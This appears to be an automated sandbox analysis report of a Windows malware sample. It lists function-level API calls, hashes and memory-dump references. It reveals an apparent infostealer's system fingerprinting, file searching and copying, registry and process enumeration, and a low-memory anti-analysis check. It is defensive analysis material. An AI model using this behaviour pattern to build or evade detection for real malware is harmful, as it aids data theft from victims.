Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: AddressProc$Process$Exit$Heap$Alloclstrcpy$CloseEventHandleNameUser__aulldiv$ComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
String ID:
API String ID: 1175201934-0
Opcode ID: 730e3f6f912575f9d2f5eb501aecbfb4f2d6af79dc721135fd94b85e33000efd
Instruction ID: 0037ec1138340b95bb434dc328289296f16cab3c571637fdb93d627daa89b4d0
Opcode Fuzzy Hash: 730e3f6f912575f9d2f5eb501aecbfb4f2d6af79dc721135fd94b85e33000efd
Instruction Fuzzy Hash: 7E318270A00204AADB04FBF2DC56BEE7779AF08708F10451EF112A61D2DF789A85C7AD

Uniqueness

Uniqueness Score: -1.00%

Function 004123F0 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(?,04147E58), ref: 0041244B

Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

lstrcat.KERNEL32(?,00000000), ref: 00412471
lstrcat.KERNEL32(?,?), ref: 00412490
lstrcat.KERNEL32(?,?), ref: 004124A4
lstrcat.KERNEL32(?,04126468), ref: 004124B7
lstrcat.KERNEL32(?,?), ref: 004124CB
lstrcat.KERNEL32(?,041482D8), ref: 004124DF

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00415490: GetFileAttributesA.KERNEL32(00000000,?,0040E9F4,?,00000000,?,00000000,0041D76E,0041D76B), ref: 0041549F

Part of subcall function 004121F0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00412200
Part of subcall function 004121F0: HeapAlloc.KERNEL32(00000000), ref: 00412207
Part of subcall function 004121F0: wsprintfA.USER32 ref: 00412223
Part of subcall function 004121F0: FindFirstFileA.KERNEL32(?,?), ref: 0041223A

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
String ID:
API String ID: 167551676-0
Opcode ID: 6103e27345c9a11c188d3e1fa81259371cccefca6cbec786149d127ceb43b465
Instruction ID: 26a05e4f659b4c4b868bb0234a0ad995871bbc4a3af1f84cd303f322fad0653f
Opcode Fuzzy Hash: 6103e27345c9a11c188d3e1fa81259371cccefca6cbec786149d127ceb43b465
Instruction Fuzzy Hash: 083164B6900608A7CB20FBB0DC95EE9773DAB48704F40458EB3469A051EA7897C8CFD8

Uniqueness

Uniqueness Score: -1.00%

Function 004011E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 004011FE
__aulldiv.LIBCMT ref: 00401218
__aulldiv.LIBCMT ref: 00401226
ExitProcess.KERNEL32 ref: 00401254

Strings

@, xrefs: 004011F3

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: __aulldiv$ExitGlobalMemoryProcessStatus
String ID: @
API String ID: 3404098578-2766056989
Opcode ID: bb81cb4acda70f26030c3c2501203c3bf716c46d07ed01ddf58a3b899f1b5564
Instruction ID: 7bcd30568b3a9749f5c78c38f6ef54fea4689c821e8202ed383253ad67bcf250
Opcode Fuzzy Hash: bb81cb4acda70f26030c3c2501203c3bf716c46d07ed01ddf58a3b899f1b5564
Instruction Fuzzy Hash: 8601FFB0940208EADB10EFD0CD4AB9EBBB8AB54705F204059E705B62D0D6785545875D

Uniqueness

Uniqueness Score: -1.00%

Function 6CD0C930 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 6CD0C947
VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6CD0C969
GetSystemInfo.KERNEL32(?), ref: 6CD0C9A9
VirtualFree.KERNEL32(00000000,?,00008000), ref: 6CD0C9C8
VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6CD0C9E2

Memory Dump Source

Source File: 00000000.00000002.2196135019.000000006CCF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CCF0000, based on PE: true

Associated: 00000000.00000002.2196118834.000000006CCF0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2196180891.000000006CD6D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2196200691.000000006CD7E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2196218365.000000006CD82000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ccf0000_q27UFusYdn.jbxd

Similarity

API ID: Virtual$AllocInfoSystem$Free
String ID:
API String ID: 4191843772-0
Opcode ID: 7eb7aa4a59249a2b778e8fd8ac88dcf8eb692eb920d0bf8402c73e251bd528da
Instruction ID: cf9dc8d1fcbe6a4d13c950a0a43d9be9b4f354e56f64627eeaf17daaeddcff13
Opcode Fuzzy Hash: 7eb7aa4a59249a2b778e8fd8ac88dcf8eb692eb920d0bf8402c73e251bd528da
Instruction Fuzzy Hash: 1B21FF71741614ABEB155F28DC84BAE73BDFB86705F500119FA4797B90D7705C0487B1

Uniqueness

Uniqueness Score: -1.00%

Function 00412980 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 70stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

lstrcat.KERNEL32(?,00000000), ref: 004129BA
lstrcat.KERNEL32(?,0041D888), ref: 004129D7
lstrcat.KERNEL32(?,04143560), ref: 004129EB
lstrcat.KERNEL32(?,0041D88C), ref: 004129FD

Part of subcall function 00412570: wsprintfA.USER32 ref: 00412589
Part of subcall function 00412570: FindFirstFileA.KERNEL32(?,?), ref: 004125A0

Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D864), ref: 004125CE
Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D868), ref: 004125E4
Part of subcall function 00412570: FindNextFileA.KERNEL32(000000FF,?), ref: 004127B9
Part of subcall function 00412570: FindClose.KERNEL32(000000FF), ref: 004127CE

Strings

L0A, xrefs: 00412A22, 00412A51, 00412A73, 00412A25, 00412A54

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
String ID: L0A
API String ID: 2667927680-1482484291
Opcode ID: f3e6bd076d21e16df55fd7eb472b4ad65ac1318d51bf9674c6e2c7c7c76ac990
Instruction ID: f34e92357168eddbedcb052ffd5f2c6281475bb6170069d81cff4dd89e8051f4
Opcode Fuzzy Hash: f3e6bd076d21e16df55fd7eb472b4ad65ac1318d51bf9674c6e2c7c7c76ac990
Instruction Fuzzy Hash: A621CCBA9005087BC724FBA0DD46EDA373E9B54745F00058AB64956081EE7867C48BD5

Uniqueness

Uniqueness Score: -1.00%

Function 00401260 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 00401274
HeapAlloc.KERNEL32(00000000), ref: 0040127B
RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 00401297
RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012B5
RegCloseKey.ADVAPI32(?), ref: 004012BF

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: df6da7dedf044903e367d3d8a7ae0c03a7d74832a2c3d67e0360b54011cb2cfc
Instruction ID: 7bc2c45b39987af01ac2684a9b0918313f40fb8da876f9e4b9d967da472c28c8
Opcode Fuzzy Hash: df6da7dedf044903e367d3d8a7ae0c03a7d74832a2c3d67e0360b54011cb2cfc
Instruction Fuzzy Hash: 3C011D79A40608BFDB20DFE0DD49FAEB779AB88700F008159FA05E7280DA749A018B90

Uniqueness

Uniqueness Score: -1.00%

Function 00414740 Relevance: 7.5, APIs: 5, Instructions: 38registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414754
HeapAlloc.KERNEL32(00000000), ref: 0041475B
RegOpenKeyExA.KERNEL32(80000002,0412B128,00000000,00020119,00000000), ref: 0041477B
RegQueryValueExA.KERNEL32(00000000,04148658,00000000,00000000,000000FF,000000FF), ref: 0041479C
RegCloseKey.ADVAPI32(00000000), ref: 004147A6

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: 3dd853a6faa74efcafe4ce3258c312c5c269cfcf31c2ef5712d88dc1f31cf0da
Instruction ID: 520453153fef2218f7e1f18e9bcc50e310f062f1fe861ea372c3465721436b4a
Opcode Fuzzy Hash: 3dd853a6faa74efcafe4ce3258c312c5c269cfcf31c2ef5712d88dc1f31cf0da
Instruction Fuzzy Hash: 62013C79A40608FFDB20DBE4ED49FAEB779EB88700F108159FA05A6290DB705A018F90

Uniqueness

Uniqueness Score: -1.00%

Function 00414300 Relevance: 7.5, APIs: 5, Instructions: 38registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414314
HeapAlloc.KERNEL32(00000000), ref: 0041431B
RegOpenKeyExA.KERNEL32(80000002,0412B3C8,00000000,00020119,00000000), ref: 0041433B
RegQueryValueExA.KERNEL32(00000000,04147BD0,00000000,00000000,000000FF,000000FF), ref: 0041435C
RegCloseKey.ADVAPI32(00000000), ref: 00414366

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: 423f413abd2b9c08310d568d7ed0a8882adbdfbf2920ff6ae677e6fc83315809
Instruction ID: 8a55c6bb4586fa39bc5dd89715e436abefd5940c4b9bd8db073c1251d6bd8ac1
Opcode Fuzzy Hash: 423f413abd2b9c08310d568d7ed0a8882adbdfbf2920ff6ae677e6fc83315809
Instruction Fuzzy Hash: E3014FB5A40608BFDB20DBE4ED49FAEB77DEB88701F005154FA05E7290DB70AA01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00409970 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116libraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(041432B0,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,?,?,?,?,?,?,?,0040EA16), ref: 0040998D
LoadLibraryA.KERNEL32(041484D8,?,?,?,?,?,?,?,?,?,?,?,0040EA16), ref: 00409A16

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,041431B0,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

SetEnvironmentVariableA.KERNEL32(041432B0,00000000,00000000,?,0041DA4C,?,0040EA16,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0041D6EF), ref: 00409A02

Strings

C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 00409982, 00409996, 004099AC

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
API String ID: 2929475105-3463377506
Opcode ID: 8ade76cb7972d7545d1cdae6b8c2efec5127d19485faea56a3866a558087ec3a
Instruction ID: 6647cd3c00128b620a4a232c7fbe97fce3d03bd073b05a107f0d1bf2b4fd60a8
Opcode Fuzzy Hash: 8ade76cb7972d7545d1cdae6b8c2efec5127d19485faea56a3866a558087ec3a
Instruction Fuzzy Hash: 134196B5900A009BDB24DFA4FD85AAE37B6BB44305F01512EF405A72E2DFB89D46CF54

Uniqueness

Uniqueness Score: -1.00%

Function 004065D0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,@:h@,@:h@), ref: 0040668F

Strings

@:h@, xrefs: 00406670, 00406673
:h@, xrefs: 004065DD, 004065FD, 0040667F
:h@, xrefs: 0040660D, 00406629, 00406678, 00406688, 004065F4, 00406618, 00406623

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID: :h@$:h@$@:h@
API String ID: 544645111-3492212131
Opcode ID: 3a0ba57e5e1d9d33aaf5f8e161c54dbb9d0ff39d4d0ab0475c83cdde206519fc
Instruction ID: 05c83ec730d02739dc9afbe7597ff905435882b08ae1c12394b3aafa6fe5c026
Opcode Fuzzy Hash: 3a0ba57e5e1d9d33aaf5f8e161c54dbb9d0ff39d4d0ab0475c83cdde206519fc
Instruction Fuzzy Hash: 272131B4A00208EFDB04CF85C544BAEBBB1FF48304F1185AAD406AB381D3399A91DF85

Uniqueness

Uniqueness Score: -1.00%

Function 0040CEC0 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00415260: GetSystemTime.KERNEL32(?,04146770,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CF41
lstrlen.KERNEL32(00000000), ref: 0040D0DF
lstrlen.KERNEL32(00000000), ref: 0040D0F3
DeleteFileA.KERNEL32(00000000), ref: 0040D16C

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: cd629de8ee10eada1f72c85526e9c289853b14595428188ec74a26340a2c39ec
Instruction ID: 64a31cdf4344fffa4b83296b1621afa9cae3fe45de11617b70f8002e61f1a089
Opcode Fuzzy Hash: cd629de8ee10eada1f72c85526e9c289853b14595428188ec74a26340a2c39ec
Instruction Fuzzy Hash: 758147769102049BCB14FBA1DC52EEE7739BF54308F51411EF516B6091EF38AA89CBB8

Uniqueness

Uniqueness Score: -1.00%

Function 0040FD10 Relevance: 6.1, APIs: 2, Strings: 1, Instructions: 857stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 004141C0: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004141DF
Part of subcall function 004141C0: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041421C
Part of subcall function 004141C0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004142A0
Part of subcall function 004141C0: HeapAlloc.KERNEL32(00000000), ref: 004142A7

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00414300: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414314
Part of subcall function 00414300: HeapAlloc.KERNEL32(00000000), ref: 0041431B
Part of subcall function 00414300: RegOpenKeyExA.KERNEL32(80000002,0412B3C8,00000000,00020119,00000000), ref: 0041433B
Part of subcall function 00414300: RegQueryValueExA.KERNEL32(00000000,04147BD0,00000000,00000000,000000FF,000000FF), ref: 0041435C
Part of subcall function 00414300: RegCloseKey.ADVAPI32(00000000), ref: 00414366

Part of subcall function 00414380: GetCurrentProcess.KERNEL32(00000000,?,?,0040FF99,00000000,?,04148338,00000000,?,0041D74C,00000000,?,00000000,00000000,?,04143550), ref: 0041438F
Part of subcall function 00414380: IsWow64Process.KERNEL32(00000000,?,?,0040FF99,00000000,?,04148338,00000000,?,0041D74C,00000000,?,00000000,00000000,?,04143550), ref: 00414396

Part of subcall function 004143C0: GetProcessHeap.KERNEL32(00000000,00000104,00401177,04143330,004136EB,0041D6E3), ref: 004143CD
Part of subcall function 004143C0: HeapAlloc.KERNEL32(00000000), ref: 004143D4
Part of subcall function 004143C0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC

Part of subcall function 00414400: GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
Part of subcall function 00414400: HeapAlloc.KERNEL32(00000000), ref: 00414414
Part of subcall function 00414400: GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C

Part of subcall function 00414450: GetProcessHeap.KERNEL32(00000000,00000104,?,0041D748,00000000,?,00000000,0041D2B1), ref: 0041445D
Part of subcall function 00414450: HeapAlloc.KERNEL32(00000000), ref: 00414464
Part of subcall function 00414450: GetLocalTime.KERNEL32(?), ref: 00414471
Part of subcall function 00414450: wsprintfA.USER32 ref: 004144A0

Part of subcall function 004144B0: GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,04147AE0,00000000,?,0041D758,00000000,?,00000000,00000000,?,04148358,00000000), ref: 004144C0
Part of subcall function 004144B0: HeapAlloc.KERNEL32(00000000), ref: 004144C7
Part of subcall function 004144B0: GetTimeZoneInformation.KERNEL32(?), ref: 004144DA

Part of subcall function 00414530: GetUserDefaultLocaleName.KERNEL32(00000000,00000055,00000000,00000000,?,04147AE0,00000000,?,0041D758,00000000,?,00000000,00000000,?,04148358,00000000), ref: 00414542

Part of subcall function 00414570: GetKeyboardLayoutList.USER32(00000000,00000000,0041D146), ref: 0041459E
Part of subcall function 00414570: LocalAlloc.KERNEL32(00000040,?), ref: 004145B6
Part of subcall function 00414570: GetKeyboardLayoutList.USER32(?,00000000), ref: 004145CA
Part of subcall function 00414570: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0041461F
Part of subcall function 00414570: LocalFree.KERNEL32(00000000), ref: 004146DF

Part of subcall function 00414710: GetSystemPowerStatus.KERNEL32(00000000), ref: 0041471A

GetCurrentProcessId.KERNEL32(00000000,?,04148378,00000000,?,0041D76C,00000000,?,00000000,00000000,?,04147BE8,00000000,?,0041D768,00000000), ref: 0041037E

Part of subcall function 00415B70: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00415B84
Part of subcall function 00415B70: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00415BA5
Part of subcall function 00415B70: CloseHandle.KERNEL32(00000000), ref: 00415BAF

Part of subcall function 00414740: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414754
Part of subcall function 00414740: HeapAlloc.KERNEL32(00000000), ref: 0041475B
Part of subcall function 00414740: RegOpenKeyExA.KERNEL32(80000002,0412B128,00000000,00020119,00000000), ref: 0041477B
Part of subcall function 00414740: RegQueryValueExA.KERNEL32(00000000,04148658,00000000,00000000,000000FF,000000FF), ref: 0041479C
Part of subcall function 00414740: RegCloseKey.ADVAPI32(00000000), ref: 004147A6

Part of subcall function 00414800: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00414846
Part of subcall function 00414800: GetLastError.KERNEL32 ref: 00414855

Part of subcall function 004147C0: GetSystemInfo.KERNEL32(00000000), ref: 004147CD
Part of subcall function 004147C0: wsprintfA.USER32 ref: 004147E3

Part of subcall function 00414960: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,04147A98,00000000,?,0041D774,00000000,?,00000000,00000000,?,041479F0), ref: 0041496D
Part of subcall function 00414960: HeapAlloc.KERNEL32(00000000), ref: 00414974
Part of subcall function 00414960: GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00414995
Part of subcall function 00414960: __aulldiv.LIBCMT ref: 004149AF
Part of subcall function 00414960: __aulldiv.LIBCMT ref: 004149BD
Part of subcall function 00414960: wsprintfA.USER32 ref: 004149E9

Part of subcall function 00414ED0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00414F1C
Part of subcall function 00414ED0: HeapAlloc.KERNEL32(00000000), ref: 00414F23
Part of subcall function 00414ED0: wsprintfA.USER32 ref: 00414F3D

Part of subcall function 00414AE0: RegOpenKeyExA.KERNEL32(00000000,04141C38,00000000,00020019,00000000,0041D289), ref: 00414B41

Part of subcall function 00414AE0: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414BC3
Part of subcall function 00414AE0: wsprintfA.USER32 ref: 00414BF6
Part of subcall function 00414AE0: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00414C18
Part of subcall function 00414AE0: RegCloseKey.ADVAPI32(00000000), ref: 00414C29
Part of subcall function 00414AE0: RegCloseKey.ADVAPI32(00000000), ref: 00414C36

Part of subcall function 00414DE0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00414E07
Part of subcall function 00414DE0: Process32First.KERNEL32(00000000,00000128), ref: 00414E1B
Part of subcall function 00414DE0: Process32Next.KERNEL32(00000000,00000128), ref: 00414E30
Part of subcall function 00414DE0: FindCloseChangeNotification.KERNEL32(00000000), ref: 00414E9E

lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041095B

